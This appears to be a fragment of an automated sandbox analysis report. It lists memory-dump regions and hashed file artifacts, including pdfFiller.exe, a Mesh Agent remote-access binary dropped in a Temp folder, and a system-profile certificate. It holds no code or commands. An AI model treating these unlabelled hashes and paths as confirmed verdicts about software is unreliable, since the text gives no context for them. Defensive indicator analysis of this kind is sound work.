memory/4528-443-0x0000000004A90000-0x0000000004AB2000-memory.dmp

memory/1912-457-0x00000000054E0000-0x0000000005834000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y5crqkzo.un1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3012-513-0x00000000022E0000-0x00000000022E1000-memory.dmp

memory/1912-568-0x0000000005B00000-0x0000000005B1E000-memory.dmp

memory/1912-570-0x0000000005EE0000-0x0000000005F2C000-memory.dmp

memory/1912-589-0x0000000006020000-0x000000000603A000-memory.dmp

memory/1912-588-0x0000000007160000-0x00000000077DA000-memory.dmp

memory/1912-595-0x000000006DE00000-0x000000006DE4C000-memory.dmp

memory/1912-605-0x0000000006D20000-0x0000000006D3E000-memory.dmp

memory/1912-606-0x0000000006DA0000-0x0000000006E43000-memory.dmp

memory/1912-594-0x0000000006D60000-0x0000000006D92000-memory.dmp

memory/1912-612-0x0000000006EA0000-0x0000000006EAA000-memory.dmp

memory/1912-615-0x00000000070C0000-0x0000000007156000-memory.dmp

memory/1912-618-0x0000000007020000-0x0000000007031000-memory.dmp

memory/1912-626-0x0000000007060000-0x000000000706E000-memory.dmp

memory/1912-628-0x0000000007070000-0x0000000007084000-memory.dmp

memory/1912-630-0x00000000077E0000-0x00000000077FA000-memory.dmp

memory/1912-632-0x00000000070A0000-0x00000000070A8000-memory.dmp

C:\Program Files (x86)\pdfFiller\pdfFiller.exe

MD5 46d083e25c4d49f928d3b025ba1e00f6
SHA1 02e7f5c91749bd65290e01c5ee0fba151e8e3682
SHA256 ccb88594f2495e896c6b3c01cc1dd5838779cea06687d41ae64037471d551c2f
SHA512 88416aad10975f25d471f63e908be09b50752a6806a8b8ac28ba096cf1b78aa179a975ac0519582667ed8e9b7a92d290dc9c20a50a6fbbc2f00397aaeb8e445d

memory/2336-661-0x0000000000D30000-0x0000000001028000-memory.dmp

memory/2336-665-0x0000000006080000-0x00000000067E4000-memory.dmp

memory/2336-670-0x0000000005DD0000-0x0000000005E20000-memory.dmp

memory/2336-671-0x0000000005EA0000-0x0000000005F16000-memory.dmp

memory/2336-692-0x0000000006CD0000-0x0000000006CF4000-memory.dmp

memory/2336-694-0x0000000007150000-0x0000000007202000-memory.dmp

memory/2336-698-0x0000000006D30000-0x0000000006D3C000-memory.dmp

memory/2336-699-0x0000000006D40000-0x0000000006D48000-memory.dmp

memory/2336-701-0x0000000006D90000-0x0000000006DAA000-memory.dmp

memory/2336-700-0x0000000006D60000-0x0000000006D68000-memory.dmp

memory/2336-706-0x0000000007A70000-0x0000000007F9C000-memory.dmp

memory/2336-711-0x000000000A940000-0x000000000A948000-memory.dmp

memory/2336-713-0x000000000B3C0000-0x000000000B3CE000-memory.dmp

memory/2336-712-0x000000000B3E0000-0x000000000B418000-memory.dmp

memory/2336-715-0x000000000B450000-0x000000000B478000-memory.dmp

memory/2336-719-0x000000000BBF0000-0x000000000C194000-memory.dmp

memory/2336-718-0x000000000B5C0000-0x000000000B636000-memory.dmp

memory/2336-717-0x000000000B520000-0x000000000B5B2000-memory.dmp

C:\Users\Admin\AppData\Local\pdfFiller\pdfFiller.exe_Url_i1z3rwcod0vxpymez4420j0vzwmjgxdq\1.0.0.0\user.config

MD5 9e47641b957d0d1a102c9bec8abf4bdb
SHA1 31ed884579caf76fb7176c46b8d40a5a889e9651
SHA256 9c093726299239549246c730d16222814ee42463bc6018601c0bf5ef31cf7989
SHA512 6a5012100ce5f28799c221c1c91c79830415ec22b374e6d3614c14bce1c9987442e9abb5a2186c5fe6595ec97ddb5a26c290c12fb5c6043830b18794dbb6ea4e

C:\Users\Admin\AppData\Local\pdfFiller\pdfFiller.exe_Url_i1z3rwcod0vxpymez4420j0vzwmjgxdq\1.0.0.0\dr4r51h5.newcfg

MD5 87ffbcaa0eb520a257d5ac0c286675f4
SHA1 b2aa8296d7da3337992e247ceeaae1e307b3e713
SHA256 d770d384f890a45efb6179fd33ac101ee060cb98fccd1231244d47496544750c
SHA512 cba20b9c0eedcb5ecc8ac11f198d7592902514cfed5c48aa62d098dbc2e20d5b5f45a74111c953acf9d123fa40b133774e02f9aa1018d716aa3bbcec0bc6077a

memory/2336-744-0x000000000D2F0000-0x000000000D3AA000-memory.dmp

memory/4528-782-0x0000000007110000-0x0000000007132000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe

MD5 546157d9f4974c5b9871be88d6814a3e
SHA1 8fa936396bca1454aa4bb8f8767394ca25763383
SHA256 c9fb879ceee5d354d2f773a565f7a537cb71733ea79dce8763a819774c64304c
SHA512 8369d845ecd5670abc2d257e9a794bf59c771f1496b8ae6a74d0987c25152483cf0ca15710bbf087c6aa816700b6a8774e4dd7744b91256e2f54094b65271117

C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E99BD6830FBFC08D9F40837D3907D98FDA621288

MD5 6d592a683978a5a6ed4919c9e531f017
SHA1 c79b2e24760962a86eb0890f36fb4cf0fafc178d
SHA256 08cfd151ce0c4233027b40cfca8dfbac6171a87b043576c156969eee7e2352b9
SHA512 09cd4ff37d5a7e130d827318f8380de4ec602ec4fd9fc0aaff460c7c05c1d57634e9c06896bb92681204634ed60a4ec4439ebc37dffff4a3b3055245e97ccdce

memory/4408-943-0x00000000000C0000-0x00000000003B4000-memory.dmp

memory/4408-944-0x0000000004C60000-0x0000000004CFC000-memory.dmp

memory/3956-954-0x0000000006500000-0x000000000654C000-memory.dmp

memory/3956-955-0x000000006DE10000-0x000000006DE5C000-memory.dmp

memory/3956-965-0x0000000007650000-0x00000000076F3000-memory.dmp

memory/3956-966-0x00000000078F0000-0x0000000007901000-memory.dmp

memory/3956-967-0x0000000007920000-0x0000000007934000-memory.dmp

memory/4408-995-0x0000000004FC0000-0x0000000005150000-memory.dmp

memory/4408-996-0x0000000004C10000-0x0000000004C32000-memory.dmp

C:\Program Files (x86)\Mesh Agent\MeshAgent.db

MD5 d8e75a308c56d3d9d7e4fc89fbeaad78
SHA1 7de7213ed1d1de1aaded3f9c2cadd51d4094a20c
SHA256 7cbf65ca4c3f859419ed7ba8cc5ca69a1cae0b67cbbc4db3badcb575daeafb26
SHA512 9eb6464b377502d23b271d3672c1d8f000aa03f0426495a0670128da425c1a6f725c69740af9417dabdebf146c80835b1532b7c6ee30673541c85c998ac17035